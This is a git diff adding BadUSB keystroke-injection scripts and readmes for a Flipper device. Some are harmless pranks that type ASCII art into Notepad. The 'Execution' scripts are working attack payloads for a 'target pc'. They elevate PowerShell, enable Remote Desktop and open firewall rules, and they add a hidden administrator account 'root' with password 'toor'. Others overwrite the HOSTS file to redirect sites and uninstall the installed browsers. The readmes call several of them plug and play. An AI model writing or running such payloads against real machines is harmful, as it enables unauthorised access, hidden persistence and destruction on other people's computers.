@@@@@@#@@@#@#########@@@@@@@########@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeThonkASCII.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeThonkASCII.txt new file mode 100644 index 000000000..cd95b06a7 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeThonkASCII.txt @@ -0,0 +1,112 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 1000 +GUI UPARROW +DELAY 500 +STRING ::--=====--::. .... +ENTER +STRING .-**=::.. .:--=*#= :***======+**+: +ENTER +STRING :#*- -#+. :**. :=*+. +ENTER +STRING .**. :#%=. .#+ +ENTER +STRING #: %+ -%: +ENTER +STRING #- .:-==++++==--:-@ .%= +ENTER +STRING - :+++=-::.....:::-===++: .:-=======-: *+ +ENTER +STRING .=%+. .=%##*=-::. ....-=+**+%- +ENTER +STRING +- =%- .=#*: +ENTER +STRING +* .-*+: +ENTER +STRING =%. *+ +ENTER +STRING .-=++====++++++*+++++*++=.-@: .::---:*%. +ENTER +STRING .=*+=:::--==+++++=---=**+-..:+*#% :++****+++++++++: +ENTER +STRING +#- -+**++=-::. .:-+#*: -#*. =%- :+**+=---=-==++*#%#. +ENTER +STRING .#- +#=. .+#+-.:#= *+ .#*: -*#*++++*#**- #%- +ENTER +STRING #+=%= :-==++=+***********+++##*++**: @- -.-#@%*+++===: .*#+= +ENTER +STRING -:-+#@+: %@*:@@@@@@@@# **:*+*+ *@@%%@@@@@@#-**+--%- +ENTER +STRING :+**=%@@@#@@@- :@@ ** +#. =%=@@*+@@@==%@- .-+%+ +ENTER +STRING ==. -*@@@=#@@*==#@@ #+.% #+ +@@%=@@%-:#@= :*%= +ENTER +STRING -#*. :=*#%@@@@@@= :=+@* %+=*@@@@@@@@@@%::=#+.#. +ENTER +STRING :**-. .-=+*#*******=:. #- .:-=++++*****+=-. :%- +ENTER +STRING :=++++++++++========+++: .==-:....: +***%%. +ENTER +STRING ....:%*. -*%=--: --=*#:-%- +ENTER +STRING =***+ =%: .*= :-:. #: +ENTER +STRING .:::. .-+*+- :+. -@= +ENTER +STRING -****=--. .:=***+- .. =*=% +ENTER +STRING =*.##+****+-. .+=: #. *+ +ENTER +STRING -@ =-..:=+++++==-:. -#: =#. +ENTER +STRING =%= :*#+=:. :--+****+=--:. -#+ -%- +ENTER +STRING -#+- .:=+**+-. .:--=++****###***++++=----==+++***= =# +ENTER +STRING .-+++- .-=+++++++++++==-:. ...::::::.... -*+-#. +ENTER +STRING -**+-. ..-=+*******++****++++++***#**= # +ENTER +STRING .-+#=: .... :#: +ENTER +STRING .-+++=-::.. .-+@ +ENTER +STRING .:--=++********++======++**#**#*****+. @. +ENTER +STRING ..:::... -# +ENTER +STRING .=+++=+*+.:** +ENTER +STRING =#*: :#%. +ENTER +STRING -#= *#-. +ENTER +STRING :-=-..-+%#. .. :=++: +ENTER +STRING .#=..-#@- -# .+#=%%*#: -= =#+. +ENTER +STRING =+ -# ** =#*:.#* =%+#=. :#+ +ENTER +STRING *+. -+++%++- :++.-%%*: -*. +ENTER +STRING -#+ *= :#*-**=. .#* +ENTER +STRING +#. =##+.*#. :*- =%. +ENTER +STRING -* ++:%= -#=. -%: +ENTER +STRING :# .+@#. =# =%- .#- +ENTER +STRING =# :*+-::** -#= :*: #. +ENTER +STRING .#*#: :--%= :%= =#. .% +ENTER +STRING :: .- .-. -: .- -. + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeWowASCII.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeWowASCII.txt new file mode 100644 index 000000000..6549a7bb4 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/PepeWowASCII.txt @@ -0,0 +1,102 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 1000 +GUI UPARROW +DELAY 500 +ENTER +ENTER +ENTER +STRING .:--------::. ..::::::. +ENTER +STRING .=+***++++++++++**+=-: .:==++***++++++***=. +ENTER +STRING .=**++++++++++++++******#%*=*##*+++++++++++++**###+++++++=- +ENTER +STRING -**++++++++**########***********####+++++++++*##*++++*########+==-: +ENTER +STRING -**+++++++####*+++++++++*############%%###*++++++++####*+++*******++*##+: +ENTER +STRING :***+++++*##*++++++++*####****#########**++**#%*+*###*+*#*+==--:::--=++*##**+. +ENTER +STRING +#**+++++*#++++++++*##*+*#*+=:. .-=+*#*+@#*++*#+: .=*#% +ENTER +STRING +****+++++++++++++##*+*#*- . -+%*++%= :=*##*=. -= +ENTER +STRING +****++++++++++++*#+++#+. .+#@@@@@#=.-#%: .#@@@@@@@@#. -: +ENTER +STRING -#****++++++++++++***#*. *@@@@@@@@@@@= +* .@@++@@##@@@% -+ +ENTER +STRING %*****+++++++++*#+=:. *@@*=#@%*+#@@@- =+ -@@+*@- .@@@: .* +ENTER +STRING =#****++++++++++%- @@@*=#@ #@@+ % %@@*%%=-*@@% .* +ENTER +STRING #*****++++++++++*#*+=- #@@@@%@+::=@@@- @: .*@@@@@@@@* .+: +ENTER +STRING %*****+++++++++++++++*#+. .#@@#=@@@@@@@+ +##*- .=+**+=. -+. +ENTER +STRING :#*****++++++++++++++++++#*- -#@@@@@@%+. .*#+++*#*+-. .-+%- +ENTER +STRING =#*****+++++++++++++++*#*++*#+: .::. :*@*++++++++*##**+++++++**#**+#: +ENTER +STRING +******+++++++++++++++++##*+++*#*=:. .:=*#*##++++++++*####************+-. +ENTER +STRING +******+++++++++++++++++++*###**++*##***+++++**##**+*##+++++++++++++****#####*#: +ENTER +STRING *******+++++++++++++++++++++++**#######*********#####*+++++++++++++++++++++++++***+= +ENTER +STRING *******++++++++++++++++++++++++++++++++**********++++++++++++++++++++++++++++++++++*# +ENTER +STRING ******+++++++++++++++++++++++++++++++++++++++++++++++++++***######################*+#. +ENTER +STRING ******+++++++++++++++++++++++++++++++++++++++++**##########***********************#%%. +ENTER +STRING #*****+++++++++++++++++++++++++++++++++++*#######*************################******# +ENTER +STRING *******++++++++++++++++++++++++++++**#####**********#######%%#####***********#%***#= +ENTER +STRING =#*****++++++++++++++++++++++++*####********###%%%%%###*#########*#**********%#*#= +ENTER +STRING :#*****++++++++++++++++++++++#%#*******##%%%%###########*#########**#******#%***- +ENTER +STRING .%*****++++++++++++++++++++++%#****#%%%%##########################*##******@***# +ENTER +STRING #******+++++++++++++++++++++#%***%%###############################*#******@***# +ENTER +STRING =******+++++++++++++++++++++*@**%%%###############################********@***#: +ENTER +STRING .#******+++++++++++++++++++++%#*#%#%#############################*********@***#: +ENTER +STRING ********++++++++++++++++++++*%***%%%############################*********%#**#- +ENTER +STRING :%*******++++++++++++++++++++*%****#%%#######################************##***= +ENTER +STRING -#*******+++++++++++++++++++++##****#%####################**************#%***+ +ENTER +STRING -#*******+++++++++++++++++++++*%#****%%################*****************@***+ +ENTER +STRING -#*******++++++++++++++++++++++*%****#%##*######**#********************@***+ +ENTER +STRING .*********++++++++++++++++++++++##*****#%##*#*************************@***+ +ENTER +STRING =#*******++++++++++++++++++++++*###*****###************************%#***= +ENTER +STRING +#********++++++++++++++++++++++*###*****####****************####****#- +ENTER +STRING :+#********+++++++++++++++++++++++*###******################********#. +ENTER +STRING .+#*********+++++++++++++++++++++++*####**********************##%*. +ENTER +STRING :+*#*******+++++++++++++++++++++++++*########################- +ENTER +STRING .:=++*##****+++++++++++++++++++++++++++++++**+++++++++**- +ENTER +STRING .:-==+**#***++++++++++++++++++++++++++++****+=-. +ENTER +STRING .::--==++++++++++++=========--:. \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/RickRoll.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/RickRoll.txt new file mode 100644 index 000000000..a06eb2446 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/RickRoll.txt @@ -0,0 +1,112 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 1200 +GUI r +DELAY 600 +STRING notepad +ENTER +DELAY 750 +GUI UPARROW +DELAY 500 +STRING K00KKKKKKKKOOOOOOOOOOO0KKKKXKK00O000OOOOOOkkkkOO0KKKKKKXKKKKXKKKKK0OkxxkxxxxxxkO000KKKKKKKK000000000 +ENTER +STRING 0000OO0O0OOOO000OO0000KKKK000OkkkkkkkkxxxxkkkkxkkkkkkOO00OOO00KKKKK0OkxxxxxxxxxkO00KKKKKKKKKK0000000 +ENTER +STRING KKK0000OOOOOO0000000000OOOkkkkkOOOOkkkkkkxoolcclc:;;:clodkOOkkOOOOOOOkxxxxxkkkxxkkOOO000O00000000000 +ENTER +STRING XXXXXXXKKKKK00000000000000OOkOOOOOkkkkkOOo:,'',,,,,,,',,:ldkkkkkkxxxxxxxxxkkkkxxkxxkkOOOO00KKKXK00KK +ENTER +STRING XXXXXXXXXNNXXK00000000KKXKKK00OOkkkOkkkkdl;,'.'..''''''',;;lxOkOOOkkkkxxkkkkkkkkkkkO0KKKKKXNNNNXK0KX +ENTER +STRING XXXXXXXNNNNXKK000000000KXXXXKKKOOOO0OOOkoc:;;;,,',,,,,,,,,,;lO00K000OkkkkkkkkO00KKKKXKXXXXXNNNNNX00K +ENTER +STRING XNNXXXXXKKKK00000000KK00KKKKK000OOO00kdloolooodoooddddool;,,cOKK000OkkkkkkkkkkO0KKKKXXXXXXXXNNNNK000 +ENTER +STRING XXXXKK000000KXK0000KKK0000OOOOOOOkkkkd:codlloddddxxxxxxxxl;,lkOOkkkkkkkkxkkkkkkOO000KKKXXXXXNNNNXK00 +ENTER +STRING K0K0000000KXXXK00000KXK0000000000Okkkdcldolccloddddxxxkxxo:;lkkkkxxxk00kxkkkkkkkkkkkk00KXKXXXNNNNNXK +ENTER +STRING 000000000XXNNX000000K0000KXXXXXXXK0Okkdddl::::codolllodddo::x0OkkkxxkOOkxkkkkOOOkkkkkkOO000KXNNNXXXX +ENTER +STRING KKKK0000KXNNNXKK000000KKKXNNNNXXXXX0xkOkdllccccoxxdolloodlcx0KKKKOkxxkkkkkkkkO000OkkkkkkkkOO0XXXXXXK +ENTER +STRING XXNXXKKKKXNWNXKKKKKKKXNNNNNNXXXXXXXOodOkolllllloxxxxxxxxdooOKKKKKKOOkkkkkkkkkOK000kkkkkkkkkkOO0KKXKK +ENTER +STRING XNNXXNXKKKXNNXKKKKKKKKNNNNNNXXXXXXX0xdkkollllccoddxxxxxxdddOKKKKKK0K0OkkkkkkkOKKKOkkkkO000OkkkkkO0KK +ENTER +STRING XXXXKK00KKKKKKK00K000KXNNNNNNNXXXXXK0O0kolllllodxxxxxxxddxk0KKK0KK0K0kkxxkkkkO00OkkOO000000OkkkkkkkO +ENTER +STRING KXXK000KXXXK0K000K00KXNWNNNNNNXXXXXK0KKkollcccloddddxxxkOOKK0KK0KK0K0kxxxxkkxkkkkkkkOO000K00OOkkkkkk +ENTER +STRING 00000KXNNNNNKK0000000KNNNNNNNNXXXXXK000kdollloodxxxdddx0K0KK0KK0KK0KKOkxxxxxxxxk00OkkkOKKK0OOkkOOOOO +ENTER +STRING 00000XNNNNNNXK0000000000KNNXNNXXXK0Okkkdolllclodddddddk000KK0KK0K000Okkxxxxxxkk000K0OkO000Okkkk00K0O +ENTER +STRING XXK00XNNNNNNX00000KKK0000KXXNNXXKOkkkkkdllccccclooodddxdxO0KKKKKK0OkkkkkkxxxxkO0KKKKK0OOOOOOOkkO00Ok +ENTER +STRING XNNK0KXNNNNNK00000KXNXK00OO00000Okkkkkkdllllloddddxddkx:;lx00K00OkkxkkOOkxxkkkO0KKKKK0O0KKXK0Okkkkkk +ENTER +STRING XXNK00XNNXNNK000000KK000OOOOkkkkkkOOOxooolllloodddddkOo'..';loddxxxkO00OkkkkkkO000KKKOOKXXXKK0OkkkO0 +ENTER +STRING XXXX0OKXXXXXKOOOOO00OOO00KK0OOxxdxkOOxoodoollooooxxk0Oc.......'';::cllodxxkkkkO000KK0O0KXXXXK0OkkkO0 +ENTER +STRING XXXXKO0KXXXX0OOOOOOOOO0KK0Oxol:;:okOOkooooolllodkO00Oo,................',;:cldO00000Ok0XXKXK0kkxkkkk +ENTER +STRING KXXXKOO00KXKOkkkkOOOOkkxoc:,'...'lkkkxlccclddxkOO00kl'.......................,oO0000kk0KKKX0kkkkkxxk +ENTER +STRING 0KK00OOOOOO0Okkkkkkdl:;,'.......'cxxddc:ccoxkOO00xo:..........................,d0OOkkk0KKK0kkxO0OOkx +ENTER +STRING OOOOO0KKK0OOOkkkkkx:.............',':lc::clolodxd:,............................lOkkkkkkO00kxkkO000Ox +ENTER +STRING kOOO0XXXXXX0OOOkkkd;................;cc::cloooll:'.............................'okOOOkxkkkxxkO0KKKOk +ENTER +STRING kkO0KXXXXNNKOOOkkko,................;cccccllllc:,...............................,dO00OkkxxxxxkkOO0Ok +ENTER +STRING kkkOKXXXXXXKOOOkkko'................;cloolccc::;................................,dOO0OOkkxxxxkkkkkkk +ENTER +STRING kkkkO0XKKXX0Okkkkko,................;cldxoc::;;'.................................cxOOOOkkkxxkO0000Ok +ENTER +STRING OkkkkOKKKXX0Okkkkxl'................;:oxxo:;;;,...................................;k0Okkkkkkkk0KKXK0 +ENTER +STRING 0kkkkO0KXXX0OOkkkx:.................';lxkl;;;;,......................... .......:dxkkkOOOkk0XXXXX +ENTER +STRING 00OkkOO0KXX0OOkkkx:.................',:loc;:::'........''.............. .........':okO00OkOKXXXN +ENTER +STRING KKOkOOOOKXX0OOkkkx:..................,;::::::;.........:llolcccc:'..... .. .........;lk00OkOKXXX +ENTER +STRING OOkkO0OO0KX0OOkkkx:..... ............;:c::::;'.........:::clllllol;..... . ..........';okkk0KXX +ENTER +STRING xkkk0K0OO0KOkkkkkkl.... ............;:::;;;,..........';:cllllllol:.... ..............:xkk0KK +ENTER +STRING xkkkO0K0OOOOkkkkkko.... ...........,;;;,,,'...........';:ccllllloo:........................;xkkO0K +ENTER +STRING OO00OOOOkkkkkkkxxkc..... ..........',;;,''.............';:ccllllooc'.......................;xkxk0K +ENTER +STRING 00KKK0Okkkkkkkxxxxc..... ..........,;;,,,......... .........,;cllc,.......................'oxxxOO +ENTER +STRING 000KK0OOOkkkkkxxxd;........ .........';;,,,... ..,,'.. ......................:dxxxx +ENTER +STRING 000K0K000Okkkxxxxd:,,'...,:ccllc::;'..,;;;;,. ..,;,................:dddxx +ENTER +STRING OO00OO000Okkkxxxxxo,...,clolcc::;;,...,;;;,'. . ..................,cdddddx +ENTER +STRING O0000000Okkxxxxxdxo,..,,':l:;;;;;;,...,;;,'.. .'''........'',;:oxkxddodd +ENTER +STRING OOO0OOkkkxxxxxxxddd:''...';;;;;;;;'...,,,'.. ... .cddoollloodxxxkkkkkxdoood +ENTER +STRING OO0Okxxxxxxxxxxdddddc,....',;;,;;,. .'',,... .... .,dddxxxddddxxxxkxxdoooooo +ENTER +STRING kkkxxxxxxxxxddddddxdolc:,...',,''.. ..',,... ..'lddxxddddddxxxxxdooooooo +ENTER +STRING dddddxkkkxddddddddxkdoooc;'..... ..''.. .......cddddddddddddddddoddoooo +ENTER +STRING ooddxkkOkxdddddddxxkkxdooollc:,. .''. .........;dddddddddddddooodddoooo +ENTER +STRING oodxkkkkkxddddddddxkkkkdollool,... .''','.. .........,lddddddddddddddddddoooo +ENTER +STRING oodxkkkkkdddddddodxxxxxdollol:......,;;,,'. .........:oooddddddddoodddddoooo +ENTER +STRING ooodxxkkxddddoooodxkkxdollllc;......,;;,,'. .........,looooooooooooooddooooo +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/SimpleTroll.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/SimpleTroll.txt new file mode 100644 index 000000000..3a2e4c40a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/SimpleTroll.txt @@ -0,0 +1,28 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 2000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 1000 +GUI UPARROW +DELAY 500 +STRING _ _ _____ _ ________ _____ ______ __ _ _ _ _ _____ ______ ________ _____ ______ _____ +ENTER +STRING | | | | /\ / ____| |/ / ____| __ \ | _ \ \ / / | | | | \ | |/ ____/ __ \ \ / / ____| __ \| ____| __ \ +ENTER +STRING | |__| | / \ | | | ' /| |__ | | | | | |_) \ \_/ / | | | | \| | | | | | \ \ / /| |__ | |__) | |__ | | | | +ENTER +STRING | __ | / /\ \| | | < | __| | | | | | _ < \ / | | | | . ` | | | | | |\ \/ / | __| | _ /| __| | | | | +ENTER +STRING | | | |/ ____ \ |____| . \| |____| |__| | | |_) | | | | |__| | |\ | |___| |__| | \ / | |____| | \ \| |____| |__| | +ENTER +STRING |_| |_/_/ \_\_____|_|\_\______|_____/ |____/ |_| \____/|_| \_|\_____\____/ \/ |______|_| \_\______|_____/ +ENTER +DELAY 2000 +CTRL HOME +DELAY 2000 +CTRL END \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/readme.md new file mode 100644 index 000000000..00b209e8f --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/readme.md @@ -0,0 +1,44 @@ + +# WriteAscii + +These scripts will open notepad and print out some Ascii images. + + + + +## How to use? + +These scripts are easy to use. Just plug the Flipper in and run the scripts. No internet connection required. + + + + +## Features + +- open new .txt file +- print the image +- Fullscreen mode + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/ActivateRDP.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/ActivateRDP.txt new file mode 100644 index 000000000..705eaaea7 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/ActivateRDP.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Activates Remote Desktop. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1200 +ALT y +DELAY 1200 +GUI UP +DELAY 1200 +STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule group='remote desktop' new enable=Yes; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/readme.md new file mode 100644 index 000000000..b2a58cd6c --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ActivateRDP/readme.md @@ -0,0 +1,44 @@ + +# ActivateRDP + +This script enables Remote Desktop connections and requires RDP authentication, so it opens the necessary firewall ports to allow incoming connections. + + + + +## How to use? + +This script is easy to use. Plug the Flipper in and run the script. + + + + +## Features + +- allows remote connections +- enables RDP authentication +- allow incoming remote connections + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/ChangeWinUsername.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/ChangeWinUsername.txt new file mode 100644 index 000000000..e7b943e7b --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/ChangeWinUsername.txt @@ -0,0 +1,26 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Changes the Windows 10 username to the name of your choice. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING $User = ([Environment]::UserName) +DELAY 300 +ENTER +DELAY 500 +STRING Rename-LocalUser -Name $User -NewName "New Name" +DELAY 300 +ENTER +DELAY 500 +exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/readme.md new file mode 100644 index 000000000..f2c6314fb --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/ChangeWinUsername/readme.md @@ -0,0 +1,43 @@ + +# ChangeWinUsername + +This script simply changes the Windows Username. + + + + +## How to use? + +This script is not plug and play. You need to replace "New Name" to any name you want right here: "STRING Rename-LocalUser -Name $User -NewName "New Name"" + + + + +## Features + +- open powershell +- change windows username + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/Create_New_Windows_Admin.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/Create_New_Windows_Admin.txt new file mode 100644 index 000000000..e6703666f --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/Create_New_Windows_Admin.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Create a new Windows-User with Admin perms. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +ENTER +DELAY 560 +ALT y +DELAY 300 +STRING Net User root toor /ADD;Net LocalGroup Administrators root /ADD;Net LocalGroup Administrator root /ADD;Net LocalGroup Administratoren root /ADD;reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v root /t REG_DWORD /d 0 /f; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/readme.md new file mode 100644 index 000000000..2788680f8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/readme.md @@ -0,0 +1,45 @@ + +# Create_New_Windows_Admin + +This script creates a new windows admin user on the target pc. + + + + +## How to use? + +This script is plug and play. After the new user is created you need to use the username "root" and the password "toor" to login. + + + + +## Features + +- open powershell +- create new admin user +- create name "root" +- create password "toor" + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/DNS_Cache_Poison.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/DNS_Cache_Poison.txt new file mode 100644 index 000000000..11e50076d --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/DNS_Cache_Poison.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Poisons the DNS Cache. (https://www.cloudflare.com/learning/dns/dns-cache-poisoning/) +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 750 +WINDOWS r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 870 +ALT y +DELAY 790 +STRING $redirectionAddress="IP ADRESS HERE";$redirectedSite="URL HERE";$hosts1 = $redirectionAddress + ' ' + $redirectedSite + ([Environment]::NewLine);$hosts2 = $redirectionAddress + ' www.' + $redirectedSite;$hoststotal = $hosts1 + $hosts2;[io.file]::writealltext("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS", $hoststotal); exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/readme.md new file mode 100644 index 000000000..960acbd85 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/readme.md @@ -0,0 +1,46 @@ + +# DNS_Cache_Poison + +This script modifies the "hosts" file on a Windows operating system. You can change ip adresses of resolved domain names to open facebook.com instead of google.com when you search it for example. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change rediraction adress "$redirectionAddress="IP ADRESS HERE"" +- change rediraction url "$redirectedSite="URL HERE"" + + + + +## Features + +- open powershell +- change content of "hosts" file + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/del_browsers.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/del_browsers.txt new file mode 100644 index 000000000..07bd8213a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/del_browsers.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Delete Microsoft Edge, Chrome, Opera and Firefox from the target pc. +REM Version: 1.0 +REM Category: Execution +DELAY 800 +WINDOWS d +DELAY 800 +WINDOWS r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 800 +LEFTARROW +ENTER +DELAY 800 +STRING Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object {($_.DisplayName -like "Microsoft Edge") -or ($_.DisplayName -like "Mozilla Firefox") -or ($_.DisplayName -like "Google Chrome") -or ($_.DisplayName -like "Opera*")} | ForEach-Object {Uninstall-package $_.PSChildName -Verbose} +DELAY 200 +ENTER +DELAY 1200 +STRING exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/readme.md new file mode 100644 index 000000000..f174eb768 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Del_Browsers/readme.md @@ -0,0 +1,43 @@ + +# Delete Browsers + +This script deletes these browsers: Chrome, Edge, Opera and Firefox + + + +## How to use? + +This script is plug and play. Just plug the Flipper in and run the script. + + + + +## Features + +- open powershell +- delete browsers + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/32_wants_the_D.txt 